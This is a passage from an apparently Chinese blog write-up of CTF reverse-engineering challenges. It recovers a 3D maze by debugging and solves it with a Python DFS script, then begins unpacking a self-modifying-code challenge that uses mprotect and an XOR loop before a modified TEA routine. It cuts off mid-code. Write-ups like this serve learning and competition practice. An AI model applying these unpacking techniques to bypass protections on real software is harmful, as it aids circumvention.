class="hljs-number">1</span>; ++i )<br> {<br> <span class="hljs-keyword">for</span> ( j = <span class="hljs-number">31</span>; j >= <span class="hljs-number">0</span>; --j )<br> {<br> v0 = v5++;<br> v1 = v0;<br> result = dword_408060;<br> dword_408060[v1] = (dword_404020[<span class="hljs-number">2</span> * dword_408040 + i] >> j) & <span class="hljs-number">1</span>;<br> }<br> }<br> <span class="hljs-keyword">return</span> result;<br>}<br></code></pre></td></tr></table></figure><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031181941311.png" alt="image-20231031181941311"></p><p>v8 = sub_401AAF(v8, Str[i]);是我们的主函数,我们分析其中的代码可以分析出这是3维迷宫,u和q就是控制的三维迷宫的xyz中的x(层),他们使用一次是加减64,同时dword_408040记录的就是我们当初的层数,可以看到调用u和q的时候他会加减变化,初始值为0,w和s是控制的xyz中的y,就是每层的行数,a和d就是控制的z,每一数据具体的列数</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">sub_401AAF</span><span class="hljs-params">(<span class="hljs-type">int</span> a1, <span class="hljs-type">char</span> a2)</span><br>{<br> <span class="hljs-type">int</span> v3; <span class="hljs-comment">// [rsp+30h] [rbp+10h]</span><br><br> <span class="hljs-keyword">switch</span> ( a2 )<br> {<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'a'</span>:<br> v3 = a1 - <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'d'</span>:<br> v3 = a1 + <span class="hljs-number">1</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'q'</span>:<br> v3 = a1 - <span class="hljs-number">64</span>;<br> <span class="hljs-keyword">if</span> ( --dword_408040 < <span class="hljs-number">0</span> )<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br> <span class="hljs-keyword">goto</span> LABEL_11;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'s'</span>:<br> v3 = a1 + <span class="hljs-number">8</span>;<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'u'</span>:<br> v3 = a1 + <span class="hljs-number">64</span>;<br> <span class="hljs-keyword">if</span> ( ++dword_408040 > <span class="hljs-number">7</span> )<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br>LABEL_11:<br> sub_401A26();<br> <span class="hljs-keyword">goto</span> LABEL_12;<br> <span class="hljs-keyword">case</span> <span class="hljs-string">'w'</span>:<br> v3 = a1 - <span class="hljs-number">8</span>;<br>LABEL_12:<br> <span class="hljs-keyword">if</span> ( v3 > <span class="hljs-number">511</span> )<br> <span class="hljs-keyword">goto</span> LABEL_16;<br> <span class="hljs-keyword">if</span> ( dword_408060[v3] )<br> {<br> dword_408044 = <span class="hljs-number">1</span>;<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br> <span class="hljs-keyword">return</span> (<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span>)v3;<br> <span class="hljs-keyword">default</span>:<br>LABEL_16:<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"You crossed the line!Get out of here!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br>}<br></code></pre></td></tr></table></figure><p>我们分析完了源码接下来就是思考如何获取迷宫,我们采用动调的方式进行取值,我们输入很多u,让他每次判断都是往u的判断里走,因为我们要让dword_408040的值变化,因为生成迷宫的函数中就是根据这个的值进行变化的,然后每次他都会调用一下sub_401A26(),生成对应层的迷宫,调用完了后,我们手动把RIP的值改成0x0000000000401B0F,让他再次进入u这个case判断中,对dword_408040进行自加1,然后继续调用sub_401A26,直到最后dword_408040的值大于7位置,我们到目前也能判断出他是8x8x8的三维迷宫</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031182756375.png" alt="image-20231031182756375"></p><p>调试出了迷宫后我们就可以使用脚本,或者自己读出我们的路径了</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><code class="hljs python">maze = [<span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>,<br> <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">1</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">2</span>]<br><br><br><span class="hljs-comment"># maze[x * 64 + y * 8 + z]</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check_point_valid</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> <span class="hljs-keyword">if</span> (x >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (x <= <span class="hljs-number">7</span>) <span class="hljs-keyword">and</span> (y >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (y <= <span class="hljs-number">7</span>) <span class="hljs-keyword">and</span> (z >= <span class="hljs-number">0</span>) <span class="hljs-keyword">and</span> (z <= <span class="hljs-number">7</span>):<br> <span class="hljs-keyword">return</span> (<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] != <span class="hljs-number">1</span>) <span class="hljs-keyword">and</span> ((<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">0</span>) <span class="hljs-keyword">or</span> (<span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">2</span>))<br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">gen_nex</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> all_dir = []<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x - <span class="hljs-number">1</span>, y, z):<br> all_dir.append((x - <span class="hljs-number">1</span>, y, z, <span class="hljs-string">'q'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x + <span class="hljs-number">1</span>, y, z):<br> all_dir.append((x + <span class="hljs-number">1</span>, y, z, <span class="hljs-string">'u'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y - <span class="hljs-number">1</span>, z):<br> all_dir.append((x, y - <span class="hljs-number">1</span>, z, <span class="hljs-string">'w'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y + <span class="hljs-number">1</span>, z):<br> all_dir.append((x, y + <span class="hljs-number">1</span>, z, <span class="hljs-string">'s'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y, z - <span class="hljs-number">1</span>):<br> all_dir.append((x, y, z - <span class="hljs-number">1</span>, <span class="hljs-string">'a'</span>))<br> <span class="hljs-keyword">if</span> check_point_valid(<span class="hljs-built_in">map</span>, x, y, z + <span class="hljs-number">1</span>):<br> all_dir.append((x, y, z + <span class="hljs-number">1</span>, <span class="hljs-string">'d'</span>))<br> <span class="hljs-built_in">print</span>(all_dir)<br> <span class="hljs-keyword">return</span> all_dir<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">check_success</span>(<span class="hljs-params"><span class="hljs-built_in">map</span>, x, y, z</span>):<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] == <span class="hljs-number">2</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br> <span class="hljs-keyword">else</span>:<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">False</span><br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">dfs</span>(<span class="hljs-params">mapb, x, y, z, path</span>):<br> <span class="hljs-built_in">map</span> = mapb.copy()<br> <span class="hljs-keyword">if</span> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] != <span class="hljs-number">2</span>:<br> <span class="hljs-built_in">map</span>[x * <span class="hljs-number">64</span> + y * <span class="hljs-number">8</span> + z] = <span class="hljs-number">1</span><br> <span class="hljs-keyword">if</span> check_success(<span class="hljs-built_in">map</span>, x, y, z):<br> <span class="hljs-built_in">print</span>(path)<br> <span class="hljs-keyword">return</span> <span class="hljs-literal">True</span><br><br> next_point = gen_nex(<span class="hljs-built_in">map</span>, x, y, z)<br> <span class="hljs-keyword">for</span> n <span class="hljs-keyword">in</span> next_point:<br> pathn = path + n[<span class="hljs-number">3</span>]<br> dfs(<span class="hljs-built_in">map</span>, n[<span class="hljs-number">0</span>], n[<span class="hljs-number">1</span>], n[<span class="hljs-number">2</span>], pathn)<br><br><br>outpus = <span class="hljs-string">""</span><br>dfs(maze, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, outpus)<br></code></pre></td></tr></table></figure><blockquote><p>ssdddssuuuwwwwqqqdddduussaauuuaaaaassssqddddddduuwwwaasusssdd</p></blockquote><p>我们分析最后的函数,可以直接通过动调获取flag</p><p><img src="C:\Users\a\AppData\Roaming\Typora\typora-user-images\image-20231031183240426.png" alt="image-20231031183240426"></p><h3 id="WEEK3-ststst"><a href="#WEEK3-ststst" class="headerlink" title="[WEEK3]ststst"></a>[WEEK3]ststst</h3><p>SMC加tea</p><p>我们分析代码,可以看到有一段修改内存的函数,以及赋予内存修改权限的mprotect,我们猜测这就是SMC的自解密</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-type">int</span> <span class="hljs-title function_">sub_400763</span><span class="hljs-params">()</span><br>{<br> <span class="hljs-type">int</span> i; <span class="hljs-comment">// [rsp+Ch] [rbp-14h]</span><br><br> mprotect(&dword_400000, <span class="hljs-number">0x1000</span>uLL, <span class="hljs-number">7</span>);<br> <span class="hljs-keyword">for</span> ( i = <span class="hljs-number">0</span>; i < (sub_400763 - sub_400696); ++i )<br> *(sub_400696 + i) ^= <span class="hljs-number">0xC3</span>u;<br> <span class="hljs-keyword">return</span> mprotect(&dword_400000, <span class="hljs-number">0x1000</span>uLL, <span class="hljs-number">5</span>);<br>}<br></code></pre></td></tr></table></figure><p>直接动调,然后选中全部的数据按u,然后选中函数头按c和p,就可以编译成一个完整的函数,我们可以看到是一个魔改tea加密,他修改了sum的值,我们用别人的脚本跑一下就行</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c">__int64 __fastcall <span class="hljs-title function_">sub_400696</span><span class="hljs-params">(<span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> *a1, _DWORD *key)</span><br>{<br> __int64 result; <span class="hljs-comment">// rax</span><br> <span class="hljs-type">unsigned</span> <span class="hljs-type">int</span> v0; <span class="hljs-comment">// [rsp+10h] [rbp-10h]</span><br> <span 